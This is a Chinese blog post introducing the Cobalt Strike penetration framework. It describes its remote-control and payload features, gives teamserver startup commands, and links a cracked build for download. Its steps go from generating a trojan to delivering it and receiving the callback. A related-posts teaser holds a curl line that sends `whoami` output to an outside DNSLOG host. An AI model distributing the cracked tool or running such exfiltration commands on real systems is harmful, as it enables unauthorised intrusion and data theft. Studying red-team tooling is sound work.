​ Cobalt Strike(简称CS)是全球黑客公认一款非常优秀的渗透测试神器,以metasploit为基础的GUI的框架式渗透工具,集成了传统远控功能(远程桌面VNC、键盘记录、CmdShell、文件管理)、0day提权、进程注入、域内渗透、密码获取、Hash注入、端口转发、Socks代理、服务扫描、自动化溢出、可自定义攻击插件等功能;支持多协议上线(DNS/TCP/ICMP/HTTP)、多格式Payload生成(多语言ShellCode、EXE、DLL、PowerShell、脚本、自动播放、office宏病毒);钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。

环境要求:

  • 0x001 环境
    CS 3.12 或 3.13

    Kali或Win最好安装jdk1.8.5或之后版本
    设置环境变量,如path=C:\Program Files\Java\jdk1.8.0_05\bin
    0x002 kali下生成cobaltstrike.store
    ./TeamServer Win机器IP 密码随意
    0x003 Win机器上启动中转
    将cobaltstrike.store复制到Win机器CS下
    启动中转TeamServer.exe(第一次运行请右键管理员)
    TeamServer.exe Win机器IP pass
    build 20181206 by k8gege

    0x005 下载

    CobaltStrike 3.12 K8去后门破解版

    链接: https://pan.baidu.com/s/11ZNIxWdb9wblvZeU2AMcow 提取码: hu2i

    TeamServer.exe Win版中转程序

    https://github.com/k8gege/K8tools/raw/master/TeamServer.exe 20190306编译版无需kali下生成cobaltstrike.store文件

    博客里任何文章/动画/教程/软件/工具等仅供个人测试研究, 请在下载后24小时内删除,不得用于商业或非法用途,否则后果自负。

操作演示

  1. 首先把我们下载好的工具放在kail系统里面,如图

运行环境:
1
java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
2.进入文件下开始启动teamserver:
1
chmod +x teamserver

3.运行到teamservers设置本机IP和登录密码,出现如下图:
1
./teamserver ip  密码

4.然后启动并运行cobaltstrike,代码:
1
2
chmod +x cobaltstrike
cobaltstrike

5.进入如下页面,输入我们设置的IP和密码:

6.进入我们工具的首页

7.设置监听者:

8.生成木马:

9.投放病毒

10.点击运行我们投放的病毒:

11.出现如图,监听成功:

相关文章
评论
分享
  • 永恒之蓝

    一,说明 介绍:2017年5月12日晚上20时左右,全球爆发大规模蠕虫勒索软件感染事件,用户只要开机上网就可被攻击。五个小时内,包括英国、俄罗斯、整个欧洲以及国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解...

    永恒之蓝
  • SSRF原理、操作演示及防御

    SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服...

    SSRF原理、操作演示及防御
  • CSRF原理及演示

    CSRF(Crosss Site Request Forgery,跨站请求伪造)是一种网络攻击方式,也被产称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF. CSRF漏洞是因...

    CSRF原理及演示
  • XSS的payload构造及变形

    通常进行XSS脚本攻击时,一般网站都是有防护措施的,比如过滤掉我们script,javascript,或者长度限制等等,这时需要我们对我们的脚本进 行简单的变形,打到我们的目的,下面是我对常见的一些变形的分类,以及部分操作演示1.使用...

    XSS的payload构造及变形
  • XSS漏洞利用和beef使用

    安装好的kail XSS漏洞环境(这里我用的是bWAPP,百度安装即可) 首先打开我们的kail,打开我们的beef工具: q切换到/usr/share/beef-xss或者输入如下代码启动: 1./beef 然后登陆...

    XSS漏洞利用和beef使用
  • 存储型xss-H5页面截取

    环境准备 一个有XSS漏洞的页面,或者搭建一个漏洞平台 注册一个线上的XSS漏洞测试平台(有能力可以自己搭) 1.首先我们需要搭建一个本地的漏洞测试平台,这里我用的事pikachu漏洞平台(https://github.com/...

    存储型xss-H5页面截取
  • 一句话木马及变形

    一句话木马变形 介绍:网站后门,也可以叫做WebShell,黑客在入侵了一个网站后,通常会将一些asp或php文件与网 站服务器WEB目录下正常的网页文件混在一起,使得可以通过使用浏览器来访问这些asp或者php 文件,从而得到一个命...

    一句话木马及变形
  • 文件包含漏洞和PHP伪协议

    文件包含的漏洞形成文件包含就是代码注入的典型代表,PHP的文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞,文件包含漏洞大多可以直接利用获取webshel...

    文件包含漏洞和PHP伪协议
  • DNSLOG在盲注中的使用

    DNSLOG在盲注中的使用0x00 Command Execution i. *nix:12curl http://ip.port.b182oj.ceye.io/`whoami`ping `whoami`.ip.port.b182oj...

    DNSLOG在盲注中的使用
  • sql注入(二)

    报错注入、​ 报错函数(举例) ​ (1)extractvalue(参数1,参数2) ​ 从目标XML中返回查询的字符串,参数1 是string格式...

    sql注入(二)
Please check the comment setting in config.yml of hexo-theme-Annie!